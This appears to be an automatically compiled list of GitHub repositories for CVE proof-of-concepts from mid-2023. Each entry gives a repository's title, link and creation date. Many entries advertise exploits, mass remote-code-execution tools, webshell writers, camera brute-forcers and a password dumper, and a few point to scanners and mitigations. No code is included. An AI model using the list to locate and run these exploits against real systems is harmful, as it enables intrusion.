**WordPress Plugin Metform <= 2.1.3 - Improper Access Control Allowing Unauthenticated Sensitive Information Disclosure** : [RandomRobbieBF/CVE-2022-1442](https://github.com/RandomRobbieBF/CVE-2022-1442) create time: 2023-08-03T10:47:28Z

**CVE for 2023** : [iumiro/CVE-2023-1177-MLFlow](https://github.com/iumiro/CVE-2023-1177-MLFlow) create time: 2023-07-23T10:12:27Z

**Content Mask < 1.8.4 - Subscriber+ Arbitrary Options Update** : [RandomRobbieBF/CVE-2022-1203](https://github.com/RandomRobbieBF/CVE-2022-1203) create time: 2023-08-03T09:39:15Z

**no description** : [za970120604/CVE-2020-16125-Reproduction](https://github.com/za970120604/CVE-2020-16125-Reproduction) create time: 2023-08-03T08:24:28Z

**CVE-2023-38646-POC** : [fidjiw/CVE-2023-38646-POC](https://github.com/fidjiw/CVE-2023-38646-POC) create time: 2023-08-03T08:06:10Z

**no description** : [nidhi7598/linux-4.1.15_CVE-2023-3106](https://github.com/nidhi7598/linux-4.1.15_CVE-2023-3106) create time: 2023-08-03T05:15:34Z

**no description** : [yusufazizmustofa/CVE-2022-24500](https://github.com/yusufazizmustofa/CVE-2022-24500) create time: 2023-08-03T01:55:15Z

**Unquoted Service Path in the Fortect - 5.0.0.7 CVE-2023-37800** : [TraiLeR2/CVE-2023-37800](https://github.com/TraiLeR2/CVE-2023-37800) create time: 2023-08-02T20:54:54Z

**no description** : [asepsaepdin/CVE-2010-1240](https://github.com/asepsaepdin/CVE-2010-1240) create time: 2023-08-02T13:28:48Z

**Metabase Pre-auth RCE** : [shamo0/CVE-2023-38646-PoC](https://github.com/shamo0/CVE-2023-38646-PoC) create time: 2023-08-02T13:21:58Z

**no description** : [hheeyywweellccoommee/CVE-2023-28252-djtiu](https://github.com/hheeyywweellccoommee/CVE-2023-28252-djtiu) create time: 2023-08-02T11:01:33Z

**no description** : [mistymntncop/CVE-2023-2033](https://github.com/mistymntncop/CVE-2023-2033) create time: 2023-08-02T11:55:30Z

**no description** : [OfriOuzan/CVE-2021-41773_CVE-2021-42013_Exploits](https://github.com/OfriOuzan/CVE-2021-41773_CVE-2021-42013_Exploits) create time: 2023-08-02T09:50:10Z

**no description** : [726232111/CVE-2023-28252](https://github.com/726232111/CVE-2023-28252) create time: 2023-08-02T10:14:40Z

**Python Interactive Exploit for WP File Manager Vulnerability. The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension.** : [E1tex/Python-CVE-2020-25213](https://github.com/E1tex/Python-CVE-2020-25213) create time: 2023-08-02T09:06:13Z

**no description** : [unknown00759/CVE-2023-36159](https://github.com/unknown00759/CVE-2023-36159) create time: 2023-08-02T07:44:36Z

**Cross Site Scripting (XSS) vulnerability in sourcecodester Toll Tax Management System 1.0 allows remote attackers to run arbitrary code via the First Name and Last Name fields on the My Account page** : [unknown00759/CVE-2023-36158](https://github.com/unknown00759/CVE-2023-36158) create time: 2023-08-02T07:31:49Z

**CVE-2020-0688 modified exploit for Exchange 2010** : [chudamax/CVE-2020-0688-Exchange2010](https://github.com/chudamax/CVE-2020-0688-Exchange2010) create time: 2023-08-02T06:25:06Z

**no description** : [overgrowncarrot1/CVE-2021-22205](https://github.com/overgrowncarrot1/CVE-2021-22205) create time: 2023-08-02T03:15:59Z

**Brute Hikvision CAMS with CVE-2021-36260 Exploit** : [hheeyywweellccoommee/hikvision_brute-jnrxx](https://github.com/hheeyywweellccoommee/hikvision_brute-jnrxx) create time: 2023-07-18T01:01:25Z

**CVE-2023-2333-EXP** : [codeb0ss/CVE-2023-2333-EXP](https://github.com/codeb0ss/CVE-2023-2333-EXP) create time: 2023-08-02T00:36:27Z

**no description** : [jzheaux/cve-2023-34035-mitigations](https://github.com/jzheaux/cve-2023-34035-mitigations) create time: 2023-08-01T21:15:01Z

**Nmap NSE script to dump / test Solarwinds CVE-2023-23333 vulnerability** : [emanueldosreis/nmap-CVE-2023-23333-exploit](https://github.com/emanueldosreis/nmap-CVE-2023-23333-exploit) create time: 2023-08-01T16:24:37Z

**Nmap script to exploit CVE-2023-35078 - Mobile Iron Core** : [emanueldosreis/nmap-CVE-2023-35078-Exploit](https://github.com/emanueldosreis/nmap-CVE-2023-35078-Exploit) create time: 2023-08-01T15:41:12Z

**no description** : [Trinadh465/linux-4.19.72_CVE-2020-27815](https://github.com/Trinadh465/linux-4.19.72_CVE-2020-27815) create time: 2023-08-01T12:50:41Z

**no description** : [Mehran-Seifalinia/CVE-2023-37979-](https://github.com/Mehran-Seifalinia/CVE-2023-37979-) create time: 2023-08-01T11:40:14Z

**no description** : [Trinadh465/linux-4.19.72_CVE-2023-35828](https://github.com/Trinadh465/linux-4.19.72_CVE-2023-35828) create time: 2023-08-01T11:31:25Z

**CVE-2023-37979** : [Fire-Null/CVE-2023-37979](https://github.com/Fire-Null/CVE-2023-37979) create time: 2023-08-01T11:13:29Z

**Unauthenticated Command Injection in Cacti <= 1.2.22** : [4m4Sec/CVE-2022-46169](https://github.com/4m4Sec/CVE-2022-46169) create time: 2023-08-01T09:29:30Z

**Perform with Massive Command Injection (Chamilo)** : [tucommenceapousser/CVE-2023-34960-ex](https://github.com/tucommenceapousser/CVE-2023-34960-ex) create time: 2023-08-01T08:09:51Z

**A zenbleed (CVE-2023-20593) POC for windows** : [w1redch4d/windowz2-bleed](https://github.com/w1redch4d/windowz2-bleed) create time: 2023-08-01T04:33:06Z

**CVE-2019-18818/19606 Strapi RCE** : [hadrian3689/strapi_cms_3.0.0-beta.17.7](https://github.com/hadrian3689/strapi_cms_3.0.0-beta.17.7) create time: 2022-03-10T00:59:07Z

**CVE-2023-1112 Auto Exploiter** : [codeb0ss/CVE-2023-1112-EXP](https://github.com/codeb0ss/CVE-2023-1112-EXP) create time: 2023-08-01T01:02:12Z

**HTTP3ONSTEROIDS - A research on CVE 2023 25950 where HAProxy's HTTP/3 implementation fails to block a malformed HTTP header field name.** : [dhmosfunk/HTTP3ONSTEROIDS](https://github.com/dhmosfunk/HTTP3ONSTEROIDS) create time: 2023-07-31T23:57:02Z

**Perform With Mass Remote Code Execution In SPIP Version (4.2.1)** : [Pari-Malam/CVE-2023-27372](https://github.com/Pari-Malam/CVE-2023-27372) create time: 2023-07-31T20:32:36Z

**nuclei CVE 2023 all templates** : [zerbaliy3v/nuclei-cve-2023-all-templates](https://github.com/zerbaliy3v/nuclei-cve-2023-all-templates) create time: 2023-07-31T20:30:07Z

**Repo test pour la CVE** : [thomsoe/Test_CVE-2023-23946](https://github.com/thomsoe/Test_CVE-2023-23946) create time: 2023-07-31T19:13:01Z

**Easy and non-intrusive script to check for CVE-2023-35078** : [synfinner/CVE-2023-35078](https://github.com/synfinner/CVE-2023-35078) create time: 2023-07-31T18:21:40Z

**no description** : [ixSly/CVE-2022-41401](https://github.com/ixSly/CVE-2022-41401) create time: 2023-07-31T18:20:35Z

**no description** : [LazyySec/CVE-2023-24488](https://github.com/LazyySec/CVE-2023-24488) create time: 2023-07-31T11:29:16Z

**Proof of Concept for CVE-2023-38646** : [Zenmovie/CVE-2023-38646](https://github.com/Zenmovie/CVE-2023-38646) create time: 2023-07-31T11:18:21Z

**Proof of Concept for CVE-2023-38646** : [hheeyywweellccoommee/CVE-2023-38646-hmoje](https://github.com/hheeyywweellccoommee/CVE-2023-38646-hmoje) create time: 2023-07-28T13:01:16Z

**no description** : [LazyySec/Poc-Metabase-Preauth-CVE-2023-38646](https://github.com/LazyySec/Poc-Metabase-Preauth-CVE-2023-38646) create time: 2023-07-31T05:25:37Z

**GeoServer OGC Filter SQL Injection Vulnerabilities** : [EmmanuelCruzL/CVE-2023-25157](https://github.com/EmmanuelCruzL/CVE-2023-25157) create time: 2023-07-31T03:10:41Z

**This tool is built in golang language to exploit CVE-2023-35078 vulnerability inspired by similar tool in python language https://github.com/vchan-in/CVE-2023-35078-Exploit-POC** : [peller-crot/CVE-2023-35078-Poc-Exploit](https://github.com/peller-crot/CVE-2023-35078-Poc-Exploit) create time: 2023-07-31T02:24:24Z

**no description** : [timsonner/cve-2014-0160-heartbleed](https://github.com/timsonner/cve-2014-0160-heartbleed) create time: 2023-07-31T01:12:02Z

**no description** : [Muhammad-Ali007/Atlassian_CVE-2022-26134](https://github.com/Muhammad-Ali007/Atlassian_CVE-2022-26134) create time: 2023-07-30T20:56:13Z

**The largest hacking program with new tools CVE-2023-PoC for the year 2023 It contains all the attack and exploitation tools for testing websites, as well as a graphical interface to facilitate its use for beginners** : [abrahim7112/hackers](https://github.com/abrahim7112/hackers) create time: 2023-07-23T20:33:17Z

**no description** : [hheeyywweellccoommee/CVE-2016-4655-xoajc](https://github.com/hheeyywweellccoommee/CVE-2016-4655-xoajc) create time: 2023-07-01T08:00:30Z

**no description** : [cashapp323232/CVE-2023-2868CVE-2023-2868](https://github.com/cashapp323232/CVE-2023-2868CVE-2023-2868) create time: 2023-07-30T16:42:27Z

**#comeonits2023 #ie9 #Storm-0978** : [raresteak/CVE-2023-36884](https://github.com/raresteak/CVE-2023-36884) create time: 2023-07-30T14:53:25Z

**no description** : [mouadk/CVE-2023-34035-Poc](https://github.com/mouadk/CVE-2023-34035-Poc) create time: 2023-05-16T18:26:59Z

**POC for CVE-2023-38646** : [securezeron/CVE-2023-38646](https://github.com/securezeron/CVE-2023-38646) create time: 2023-07-30T09:56:52Z

**no description** : [Xuxfff/CVE-2023-38646-Poc](https://github.com/Xuxfff/CVE-2023-38646-Poc) create time: 2023-07-30T09:33:28Z

**Remote Code Execution on Metabase CVE-2023-38646** : [hheeyywweellccoommee/CVE-2023-38646-glwax](https://github.com/hheeyywweellccoommee/CVE-2023-38646-glwax) create time: 2023-07-30T02:00:49Z

**no description** : [Untrust3dX/cve_2023_30799](https://github.com/Untrust3dX/cve_2023_30799) create time: 2023-07-30T08:44:33Z

**Remote Code Execution on Metabase CVE-2023-38646** : [Chocapikk/CVE-2023-38646](https://github.com/Chocapikk/CVE-2023-38646) create time: 2023-07-30T01:12:24Z

**Mass-CVE-2023-32243** : [shaoyu521/Mass-CVE-2023-32243](https://github.com/shaoyu521/Mass-CVE-2023-32243) create time: 2023-07-29T20:43:16Z

**Proof of concept script to check if the site is vulnerable to CVE-2023-35078** : [lager1/CVE-2023-35078](https://github.com/lager1/CVE-2023-35078) create time: 2023-07-29T19:58:33Z

**no description** : [ilqarli27/CVE-2023-37164](https://github.com/ilqarli27/CVE-2023-37164) create time: 2023-07-27T21:08:37Z

**Pseudo shell for CVE-2013-0156.** : [Jjdt12/kuang_grade_mk11](https://github.com/Jjdt12/kuang_grade_mk11) create time: 2023-07-29T15:57:15Z

**no description** : [0xrobiul/CVE-2023-38646](https://github.com/0xrobiul/CVE-2023-38646) create time: 2023-07-29T13:07:00Z

**CVE-2023-22884 PoC** : [jakabakos/CVE-2023-22884](https://github.com/jakabakos/CVE-2023-22884) create time: 2023-07-29T09:26:36Z

**CVE-2023-35078 Remote Unauthenticated API Access Vulnerability Exploit POC** : [vchan-in/CVE-2023-35078-Exploit-POC](https://github.com/vchan-in/CVE-2023-35078-Exploit-POC) create time: 2023-07-29T05:06:27Z

**DoS against Belkin smart plugs via crafted firmware injection** : [Fr0stM0urne/CVE-2023-33768](https://github.com/Fr0stM0urne/CVE-2023-33768) create time: 2023-07-29T01:11:34Z

**no description** : [ridsoliveira/Fix-CVE-2023-36884](https://github.com/ridsoliveira/Fix-CVE-2023-36884) create time: 2023-07-28T20:39:37Z

**no description** : [convisolabs/CVE-2022-24834](https://github.com/convisolabs/CVE-2022-24834) create time: 2023-07-28T17:42:33Z

**no description** : [JohnGilbert57/CVE-2021-4034-Capture-the-flag](https://github.com/JohnGilbert57/CVE-2021-4034-Capture-the-flag) create time: 2023-07-28T17:12:18Z

**no description** : [yosef0x01/CVE-2023-21752](https://github.com/yosef0x01/CVE-2023-21752) create time: 2023-07-28T16:40:47Z

**Metabase pre-auth RCE PoC** : [hheeyywweellccoommee/CVE-2023-38646-suynl](https://github.com/hheeyywweellccoommee/CVE-2023-38646-suynl) create time: 2023-07-28T15:02:37Z

**Metabase pre-auth RCE PoC** : [Traumatism/CVE-2023-38646](https://github.com/Traumatism/CVE-2023-38646) create time: 2023-07-28T14:13:51Z

**no description** : [jyoti818680/CVE-2023-37779](https://github.com/jyoti818680/CVE-2023-37779) create time: 2023-07-28T13:07:45Z

**Proof of Concept for CVE-2023-38646** : [Zenmovie/CVE-2023-38646](https://github.com/Zenmovie/CVE-2023-38646) create time: 2023-07-28T12:29:16Z

**For educational purposes only** : [Pumpkin-Garden/POC_Metabase_CVE-2023-38646](https://github.com/Pumpkin-Garden/POC_Metabase_CVE-2023-38646) create time: 2023-07-28T11:43:06Z

**no description** : [jyoti818680/CVE-2023-37778](https://github.com/jyoti818680/CVE-2023-37778) create time: 2023-07-28T11:18:21Z

**no description** : [adriyansyah-mf/CVE-2023-38646--Metabase-](https://github.com/adriyansyah-mf/CVE-2023-38646--Metabase-) create time: 2023-07-28T03:39:07Z

**no description** : [Voyag3r-Security/CVE-2023-1389](https://github.com/Voyag3r-Security/CVE-2023-1389) create time: 2023-07-28T03:09:00Z

**no description** : [ZZY3312/CVE-2023-32434](https://github.com/ZZY3312/CVE-2023-32434) create time: 2023-07-28T03:06:10Z

**no description** : [anky-123/CVE-2023-37772](https://github.com/anky-123/CVE-2023-37772) create time: 2023-07-27T18:48:10Z

**no description** : [cduram/CVE-2023-39144](https://github.com/cduram/CVE-2023-39144) create time: 2023-07-27T18:32:16Z

**CVE-2023-29336** : [ayhan-dev/p0ropc](https://github.com/ayhan-dev/p0ropc) create time: 2023-07-27T17:28:41Z

**Hyper-V 1-day Exploit: CVE-2020-0917** : [hheeyywweellccoommee/CVE-2020-0917_Exploit-urcsn](https://github.com/hheeyywweellccoommee/CVE-2020-0917_Exploit-urcsn) create time: 2023-06-21T10:02:43Z

**Exploit for the vulnerability of Ultimate Member Plugin.** : [Rajneeshkarya/CVE-2023-3460](https://github.com/Rajneeshkarya/CVE-2023-3460) create time: 2023-07-27T15:19:16Z

**PowerShell script to apply Zenbleed (CVE-2023-20593) MSR workaround on Windows** : [sbaresearch/stop-zenbleed-win](https://github.com/sbaresearch/stop-zenbleed-win) create time: 2023-07-26T20:03:11Z

**CVE-2021-3129 | Laravel Debug Mode Vulnerability** : [withmasday/CVE-2021-3129](https://github.com/withmasday/CVE-2021-3129) create time: 2023-07-27T12:14:01Z

**no description** : [ilqarli27/CVE-2023-38286](https://github.com/ilqarli27/CVE-2023-38286) create time: 2023-07-27T09:13:23Z

**asdadasdasd** : [ilqarli27/CVE-2023-37474.yaml](https://github.com/ilqarli27/CVE-2023-37474.yaml) create time: 2023-07-27T08:10:01Z

**no description** : [benjaminpsinclair/Netbox-CVE-2023-37625](https://github.com/benjaminpsinclair/Netbox-CVE-2023-37625) create time: 2023-07-01T21:02:11Z

**no description** : [hheeyywweellccoommee/Netdisco-CVE-2023-37624-jawzz](https://github.com/hheeyywweellccoommee/Netdisco-CVE-2023-37624-jawzz) create time: 2023-07-26T06:01:00Z

**CVE-2023-37847漏洞证明** : [KingBangQ/CVE-2023-37847](https://github.com/KingBangQ/CVE-2023-37847) create time: 2023-07-27T02:12:57Z

**no description** : [liam-star-black-master/expluatation_CVE-2022-29078](https://github.com/liam-star-black-master/expluatation_CVE-2022-29078) create time: 2023-07-26T18:42:09Z

**no description** : [Insolent-M1nx/cve20233519](https://github.com/Insolent-M1nx/cve20233519) create time: 2023-07-26T18:22:14Z

**PoC CVE-2023-27163, SSRF, request-baskets hasta v1.2.1** : [davuXVI/CVE-2023-27163](https://github.com/davuXVI/CVE-2023-27163) create time: 2023-07-26T15:37:26Z

**Poc of SSRF for Request-Baskets (CVE-2023-27163)** : [ThickCoco/CVE-2023-27163-POC](https://github.com/ThickCoco/CVE-2023-27163-POC) create time: 2023-07-26T11:00:59Z

**Laravel RCE (CVE-2021-3129)** : [miko550/CVE-2021-3129](https://github.com/miko550/CVE-2021-3129) create time: 2023-07-26T08:05:25Z

**no description** : [benjaminpsinclair/Netdisco-CVE-2023-37624](https://github.com/benjaminpsinclair/Netdisco-CVE-2023-37624) create time: 2023-07-26T05:59:36Z

**no description** : [benjaminpsinclair/Netdisco-CVE-2023-37623](https://github.com/benjaminpsinclair/Netdisco-CVE-2023-37623) create time: 2023-06-29T02:00:37Z

**program ringkas untuk pengimbas joomla CVE-2023-23752** : [MrP4nda1337/CVE-2023-23752](https://github.com/MrP4nda1337/CVE-2023-23752) create time: 2023-07-26T04:33:46Z

**CVE-2023-24489 PoC & Exploiter** : [codeb0ss/CVE-2023-24489-PoC](https://github.com/codeb0ss/CVE-2023-24489-PoC) create time: 2023-07-26T03:19:20Z

**no description** : [lukinneberg/CVE-2023-2636](https://github.com/lukinneberg/CVE-2023-2636) create time: 2023-06-11T20:24:20Z

**Python script to exploit PlaySMS before 1.4.3** : [H3rm1tR3b0rn/CVE-2020-8644-PlaySMS-1.4](https://github.com/H3rm1tR3b0rn/CVE-2020-8644-PlaySMS-1.4) create time: 2023-07-25T23:11:51Z

**Python script to exploit PlaySMS before 1.4.3** : [hheeyywweellccoommee/CVE-2020-8644-PlaySMS-1.4-rlvpp](https://github.com/hheeyywweellccoommee/CVE-2020-8644-PlaySMS-1.4-rlvpp) create time: 2023-07-25T22:01:01Z

**Python script to exploit PlaySMS before 1.4.3** : [H3rm1tR3b0rn/CVE-2020-8644-PlaySMS-1.4](https://github.com/H3rm1tR3b0rn/CVE-2020-8644-PlaySMS-1.4) create time: 2023-07-25T21:38:12Z

**A plugin for DataSurgeon that Extracts CVE Numbers From Text (e.g: CVE-2021-56789)** : [DataSurgeon-ds/ds-cve-plugin](https://github.com/DataSurgeon-ds/ds-cve-plugin) create time: 2023-07-25T17:49:53Z

**no description** : [trustcves/CVE-2023-35801](https://github.com/trustcves/CVE-2023-35801) create time: 2023-07-24T10:40:26Z

**CVE-2022-23305 Log4J JDBCAppender SQl injection POC** : [tkomlodi/CVE-2022-23305_POC](https://github.com/tkomlodi/CVE-2022-23305_POC) create time: 2023-07-24T18:52:15Z

**no description** : [CDACesec/CVE-2023-33802](https://github.com/CDACesec/CVE-2023-33802) create time: 2023-05-18T08:23:38Z

**POC of CVE-2023-35086 only DoS** : [tin-z/CVE-2023-35086-POC](https://github.com/tin-z/CVE-2023-35086-POC) create time: 2023-07-25T01:36:07Z

**no description** : [Mantodkaz/CVE-2023-34960](https://github.com/Mantodkaz/CVE-2023-34960) create time: 2023-07-24T20:51:15Z

**The presence of a proof of concept (POC) further underscores the criticality of this security flaw. It demonstrates the feasibility of an attacker exploiting the vulnerability and reinforces the urgency of applying security patches or updates to mitigate the risk.** : [K3ysTr0K3R/CVE-2017-7921-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-7921-EXPLOIT) create time: 2023-07-24T14:48:38Z

**Citrix exploit** : [binbz/CVE-2023-3519](https://github.com/binbz/CVE-2023-3519) create time: 2023-07-24T14:20:33Z

**Learn what is BlueJam CVE-2017-0781** : [DamianSuess/Learn.BlueJam](https://github.com/DamianSuess/Learn.BlueJam) create time: 2023-07-24T12:28:02Z

**no description** : [imbas007/CVE-2023-35885](https://github.com/imbas007/CVE-2023-35885) create time: 2023-07-24T06:16:33Z

**exploit tool, write webshell,python3** : [sanmasa3/citrix_CVE-2023-3519](https://github.com/sanmasa3/citrix_CVE-2023-3519) create time: 2023-07-24T02:45:01Z

**no description** : [C04LA/CVE-2023-28121](https://github.com/C04LA/CVE-2023-28121) create time: 2023-07-23T22:38:39Z

**no description** : [Phamchie/CVE-2023-37786](https://github.com/Phamchie/CVE-2023-37786) create time: 2023-07-23T13:05:04Z

**Exploit for CVE-2021-44736** : [defensor/CVE-2021-44736](https://github.com/defensor/CVE-2021-44736) create time: 2023-07-23T10:16:27Z

**ImageMagick Arbitrary Read Files - CVE-2022-44268** : [fanbyprinciple/ImageMagick-lfi-poc](https://github.com/fanbyprinciple/ImageMagick-lfi-poc) create time: 2023-07-23T06:56:59Z

**Cloudpanel 0-day Exploit** : [passwa11/FallingSkies-CVE-2023-35885](https://github.com/passwa11/FallingSkies-CVE-2023-35885) create time: 2023-07-21T06:15:45Z

**no description** : [K3ysTr0K3R/CVE-2021-22873-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-22873-EXPLOIT) create time: 2023-07-22T21:49:54Z

**no description** : [K3ysTr0K3R/CVE-2021-4191](https://github.com/K3ysTr0K3R/CVE-2021-4191) create time: 2023-07-22T21:06:51Z

**no description** : [ahmetaltuntas/CVE-2023-28467](https://github.com/ahmetaltuntas/CVE-2023-28467) create time: 2023-07-22T20:37:15Z

**在21年,SpringBlade框架曾发现一个JWT认证的漏洞。尽管我们搜索了许多基于原理的扫描工具,但没有找到能够支持这个漏洞的工具。可能是因为这个漏洞相对冷门而不被广泛关注。** : [Securify-Pro/CVE-2021-44910_SpringBlade](https://github.com/Securify-Pro/CVE-2021-44910_SpringBlade) create time: 2023-07-22T16:48:24Z

**no description** : [D3s7R0/CVE-2023-3519-POC](https://github.com/D3s7R0/CVE-2023-3519-POC) create time: 2023-07-22T13:07:47Z

**Citrix exploit** : [exph7/CVE-2023-3519](https://github.com/exph7/CVE-2023-3519) create time: 2023-07-22T09:19:14Z

**POC for the CVE-2023-32681** : [hardikmodha/POC-CVE-2023-32681](https://github.com/hardikmodha/POC-CVE-2023-32681) create time: 2023-07-22T05:24:58Z

**Perform witth massive command injection (Chamilo)** : [Pari-Malam/CVE-2023-34960](https://github.com/Pari-Malam/CVE-2023-34960) create time: 2023-07-22T05:27:45Z

**no description** : [codeb0ss/cve-202335843](https://github.com/codeb0ss/cve-202335843) create time: 2023-07-22T04:02:01Z

**NetScaler (Citrix ADC) CVE-2023-3519 Scanner** : [KR0N-SECURITY/CVE-2023-3519](https://github.com/KR0N-SECURITY/CVE-2023-3519) create time: 2023-07-21T23:48:11Z

**CVE-2023-3519 vuln for nuclei scanner** : [SalehLardhi/CVE-2023-3519](https://github.com/SalehLardhi/CVE-2023-3519) create time: 2023-07-21T22:10:03Z

**nse script to identify server vulnerable to CVE-2023-3519** : [dorkerdevil/CitrixFall](https://github.com/dorkerdevil/CitrixFall) create time: 2023-07-21T15:44:14Z

**CVE-2022-40127 PoC and exploit** : [jakabakos/CVE-2022-40127](https://github.com/jakabakos/CVE-2022-40127) create time: 2023-07-21T12:55:16Z

**CVE-2023-3519** : [d0rb/CVE-2023-3519](https://github.com/d0rb/CVE-2023-3519) create time: 2023-07-21T11:02:21Z

**no description** : [mr-r3b00t/CVE-2023-3519](https://github.com/mr-r3b00t/CVE-2023-3519) create time: 2023-07-21T08:55:28Z

**Original PoC for CVE-2023-30367** : [S1lkys/CVE-2023-30367-mRemoteNG-password-dumper](https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper) create time: 2023-07-08T18:16:39Z

**F5 Big-IP RCE vulnerability** : [v4sh25/CVE_2022_1388](https://github.com/v4sh25/CVE_2022_1388) create time: 2023-07-21T04:23:59Z

**Proof of concept for CVE-2023-38632** : [Halcy0nic/CVE-2023-38632](https://github.com/Halcy0nic/CVE-2023-38632) create time: 2023-07-21T05:03:57Z

**CVE-2023-38408 Remote Code Execution in OpenSSH's forwarded ssh-agent** : [snowcra5h/CVE-2023-38408](https://github.com/snowcra5h/CVE-2023-38408) create time: 2023-07-21T01:53:10Z

**PowerShell Script for initial mitigation of vulnerability** : [ToddMaxey/CVE-2023-36884](https://github.com/ToddMaxey/CVE-2023-36884) create time: 2023-07-20T21:10:49Z

**no description** : [K3ysTr0K3R/CVE-2015-2166-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2015-2166-EXPLOIT) create time: 2023-07-20T15:58:01Z

**Accurately fingerprint and detect vulnerable versions of Netscaler / Citrix ADC to CVE-2023-3519** : [securekomodo/citrixInspector](https://github.com/securekomodo/citrixInspector) create time: 2023-07-20T16:05:07Z

**no description** : [K3ysTr0K3R/CVE-2010-4231-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2010-4231-EXPLOIT) create time: 2023-07-20T14:37:36Z

**Testing CVE-2022-44875** : [c0d30d1n/CVE-2022-44875-Test](https://github.com/c0d30d1n/CVE-2022-44875-Test) create time: 2023-07-20T14:30:58Z

**Proof of Concept for CVE-2023-31753 - eNdonesia Portal 8.7** : [khmk2k/CVE-2023-31753](https://github.com/khmk2k/CVE-2023-31753) create time: 2023-07-20T13:56:13Z

**Citrix Scanner for CVE-2023-3519** : [telekom-security/cve-2023-3519-citrix-scanner](https://github.com/telekom-security/cve-2023-3519-citrix-scanner) create time: 2023-07-20T13:16:38Z

**Exploit for CVE-2021-44735** : [defensor/CVE-2021-44735](https://github.com/defensor/CVE-2021-44735) create time: 2023-07-20T09:20:13Z

**Python 2.7** : [Jenderal92/CVE-2023-28121](https://github.com/Jenderal92/CVE-2023-28121) create time: 2023-07-20T09:28:26Z

**Exploit CVE-2018-0959** : [pwndorei/CVE-2018-0959](https://github.com/pwndorei/CVE-2018-0959) create time: 2023-07-20T06:44:57Z

**no description** : [lakshit1212/CVE-2021-23017-PoC](https://github.com/lakshit1212/CVE-2021-23017-PoC) create time: 2023-07-20T05:39:01Z

**Cloudpanel 0-day Exploit** : [datackmy/FallingSkies-CVE-2023-35885](https://github.com/datackmy/FallingSkies-CVE-2023-35885) create time: 2023-06-08T09:20:22Z

**CVE-2023-27163** : [overgrowncarrot1/CVE-2023-27163](https://github.com/overgrowncarrot1/CVE-2023-27163) create time: 2023-07-20T00:18:38Z

**no description** : [Muhammad-Ali007/Log4j_CVE-2021-44228](https://github.com/Muhammad-Ali007/Log4j_CVE-2021-44228) create time: 2023-07-19T18:18:16Z

**Lab Exploit (CVE-2021-521): App uses Java reflection to access Android system components, retrieving a list of all installed apps. Reflection accesses ApplicationPackageManager and PackageManagerService, exploiting vulnerability.** : [NagendraPittu/CVE-2021-521-Exploit](https://github.com/NagendraPittu/CVE-2021-521-Exploit) create time: 2023-07-19T17:49:46Z

**Lab Exploit (CVE-2021-521): App uses Java reflection to access Android system components, retrieving a list of all installed apps. Reflection accesses ApplicationPackageManager and PackageManagerService, exploiting vulnerability.** : [NagendraPittu/CVE-2021-521](https://github.com/NagendraPittu/CVE-2021-521) create time: 2023-07-19T17:08:26Z

**CVE** : [anky-123/CVE-2023-37771](https://github.com/anky-123/CVE-2023-37771) create time: 2023-07-19T14:51:04Z

**CVE-2023-30765 / ZDI-23-905 - Delta Electronics Infrasuite Device Master Privilege Escalation** : [0xfml/CVE-2023-30765](https://github.com/0xfml/CVE-2023-30765) create time: 2023-07-19T14:21:15Z

**To assist in enumerating the webserver behind the webserver** : [seanrdev/cve-2023-27163](https://github.com/seanrdev/cve-2023-27163) create time: 2023-07-19T04:35:58Z

**POC for CVE-2021-43798 written in python** : [nuker/CVE-2021-43798](https://github.com/nuker/CVE-2021-43798) create time: 2023-07-19T04:16:39Z

**text4shell script for text coomons < =1.10 CVE-2022-33980** : [joseluisinigo/riskootext4shell](https://github.com/joseluisinigo/riskootext4shell) create time: 2023-07-18T17:55:58Z

**no description** : [nkwejj/CVE-2018-17456](https://github.com/nkwejj/CVE-2018-17456) create time: 2023-07-18T15:57:36Z

**Proof of Concept for CVE-2023-38434** : [Halcy0nic/CVE-2023-38434](https://github.com/Halcy0nic/CVE-2023-38434) create time: 2023-07-18T16:09:04Z

**This shellscript given the OrgKey 0 will parse the header of the base64 artifacts found in MOVEit Logs and decrypt the Serialized object used a payload** : [toorandom/moveit-payload-decrypt-CVE-2023-34362](https://github.com/toorandom/moveit-payload-decrypt-CVE-2023-34362) create time: 2023-07-18T15:58:00Z

**no description** : [HakaKali/CVE-2017-0148](https://github.com/HakaKali/CVE-2017-0148) create time: 2023-07-18T13:32:17Z

**CVE-2023-36884 临时补丁** : [or2me/CVE-2023-36884_patcher](https://github.com/or2me/CVE-2023-36884_patcher) create time: 2023-07-18T06:22:36Z

**Chamilo__CVE-2023-34960_RCE批量扫描poc、exp** : [MzzdToT/Chamilo__CVE-2023-34960_RCE](https://github.com/MzzdToT/Chamilo__CVE-2023-34960_RCE) create time: 2023-07-18T03:39:44Z

**Brute Hikvision CAMS with CVE-2021-36260 Exploit** : [r3t4k3r/hikvision_brute](https://github.com/r3t4k3r/hikvision_brute) create time: 2023-07-18T00:31:47Z

**Automating Exploitation of CVE-2022-44268 ImageMagick Arbitrary File Read** : [narekkay/autoexploit-cve-2022-44268](https://github.com/narekkay/autoexploit-cve-2022-44268) create time: 2023-07-17T22:21:33Z

**no description** : [Muhammad-Ali007/Follina_MSDT_CVE-2022-30190](https://github.com/Muhammad-Ali007/Follina_MSDT_CVE-2022-30190) create time: 2023-07-17T15:24:54Z

**Script to check for CVE-2023-36884** : [tarraschk/CVE-2023-36884-Checker](https://github.com/tarraschk/CVE-2023-36884-Checker) create time: 2023-07-17T14:02:40Z

**Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints** : [RandomRobbieBF/CVE-2023-32117](https://github.com/RandomRobbieBF/CVE-2023-32117) create time: 2023-07-17T10:59:17Z

**This script allows for remote code execution (RCE) on Oracle WebLogic Server** : [Danny-LLi/CVE-2020-14882](https://github.com/Danny-LLi/CVE-2020-14882) create time: 2023-07-17T07:59:01Z

**no description** : [toanthang1842002/CVE-2021-40449](https://github.com/toanthang1842002/CVE-2021-40449) create time: 2023-07-17T04:07:44Z

**no description** : [hheeyywweellccoommee/CVE-2021-40449-xarrd](https://github.com/hheeyywweellccoommee/CVE-2021-40449-xarrd) create time: 2023-07-15T16:02:13Z

**no description** : [OliveiraaX/CVE-2019-7609-KibanaRCE](https://github.com/OliveiraaX/CVE-2019-7609-KibanaRCE) create time: 2023-07-17T01:42:09Z

